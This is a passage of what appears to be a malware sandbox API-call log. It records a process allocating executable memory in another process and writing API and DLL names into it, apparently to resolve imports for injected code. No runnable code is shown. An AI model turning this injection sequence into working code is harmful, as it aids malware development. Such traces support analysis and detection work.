WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adafda*, nSize=0xe, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adafda*, lpNumberOfBytesWritten=0xcdac8*=0xe) returned 1 [0189.968] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.968] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.968] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.969] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.969] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.969] ResetEvent (hEvent=0x640) returned 1 [0189.969] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.970] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.970] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.970] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.971] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.972] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.972] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.972] lstrlenA (lpString="RegQueryInfoKeyW") returned 16 [0189.972] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.972] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adafc6*, nSize=0x11, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adafc6*, lpNumberOfBytesWritten=0xcdac8*=0x11) returned 1 [0189.973] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf9c0 [0189.973] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.973] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf9c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.973] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.974] ResetEvent (hEvent=0x640) returned 1 [0189.974] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.976] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.976] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.976] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf9c0 | out: hHeap=0x2150000) returned 1 [0189.976] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.977] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.977] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.977] lstrlenA (lpString="RegEnumKeyExW") returned 13 [0189.977] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.977] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adafb6*, nSize=0xe, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adafb6*, lpNumberOfBytesWritten=0xcdac8*=0xe) returned 1 [0189.977] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.977] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.977] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.978] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.978] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.978] ResetEvent (hEvent=0x640) returned 1 [0189.978] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.979] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.979] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.979] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.979] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.979] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.979] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.979] lstrlenA (lpString="RegGetValueW") returned 12 [0189.979] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.980] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adafa6*, nSize=0xd, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adafa6*, lpNumberOfBytesWritten=0xcdac8*=0xd) returned 1 [0189.980] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.980] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf9c0 [0189.980] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.980] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf9c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.981] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.981] ResetEvent (hEvent=0x640) returned 1 [0189.981] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.981] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.981] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.982] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf9c0 | out: hHeap=0x2150000) returned 1 [0189.982] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.982] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.982] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.982] lstrlenA (lpString="RegCloseKey") returned 11 [0189.982] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.982] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaf98*, nSize=0xc, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaf98*, lpNumberOfBytesWritten=0xcdac8*=0xc) returned 1 [0189.983] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.983] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.983] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.983] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.983] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.984] ResetEvent (hEvent=0x640) returned 1 [0189.984] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.984] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.984] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.984] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.984] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.984] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.985] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0189.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb00a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0189.985] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb00a, cbMultiByte=-1, lpWideCharStr=0x32acf840, cchWideChar=12 | out: lpWideCharStr="SHELL32.dll") returned 12 [0189.985] lstrlenW (lpString="SHELL32.dll") returned 11 [0189.985] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.985] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf840*, nSize=0x18, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcdad8*=0x18) returned 1 [0189.985] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0189.986] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf9c0 [0189.986] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.986] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf9c0*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf9c0*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0189.986] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0189.986] ResetEvent (hEvent=0x640) returned 1 [0189.987] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.017] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.017] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.017] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf9c0 | out: hHeap=0x2150000) returned 1 [0190.017] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.017] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.017] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.018] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.018] lstrlenA (lpString="SHGetFolderPathW") returned 16 [0190.018] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.018] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaff8*, nSize=0x11, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaff8*, lpNumberOfBytesWritten=0xcdac8*=0x11) returned 1 [0190.018] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.018] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.018] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.019] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.019] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.019] ResetEvent (hEvent=0x640) returned 1 [0190.019] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.020] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.020] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.020] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.020] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.020] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.020] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0190.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb08a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0190.021] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb08a, cbMultiByte=-1, lpWideCharStr=0x32acf3c0, cchWideChar=10 | out: lpWideCharStr="ole32.dll") returned 10 [0190.021] lstrlenW (lpString="ole32.dll") returned 9 [0190.021] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.021] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3c0*, nSize=0x14, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcdad8*=0x14) returned 1 [0190.021] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.021] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3f0 [0190.021] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.022] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3f0*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf3f0*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0190.024] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0190.025] ResetEvent (hEvent=0x640) returned 1 [0190.025] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.030] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.031] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.031] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3f0 | out: hHeap=0x2150000) returned 1 [0190.031] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.031] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.031] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.031] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.031] lstrlenA (lpString="CoSetProxyBlanket") returned 17 [0190.031] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.032] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb078*, nSize=0x12, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb078*, lpNumberOfBytesWritten=0xcdac8*=0x12) returned 1 [0190.032] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.032] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.033] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.033] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.033] ResetEvent (hEvent=0x640) returned 1 [0190.033] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.034] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.034] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.034] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.034] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.034] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.035] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.035] lstrlenA (lpString="IIDFromString") returned 13 [0190.035] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.035] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb068*, nSize=0xe, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb068*, lpNumberOfBytesWritten=0xcdac8*=0xe) returned 1 [0190.035] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.035] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.035] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.035] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.036] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.036] ResetEvent (hEvent=0x640) returned 1 [0190.036] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.037] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.037] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.037] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.037] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.037] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.037] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.037] lstrlenA (lpString="CoCreateInstance") returned 16 [0190.038] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.038] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb054*, nSize=0x11, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb054*, lpNumberOfBytesWritten=0xcdac8*=0x11) returned 1 [0190.040] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.040] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.040] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.040] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.041] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.041] ResetEvent (hEvent=0x640) returned 1 [0190.041] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.042] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.042] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.042] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.042] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.042] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.042] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 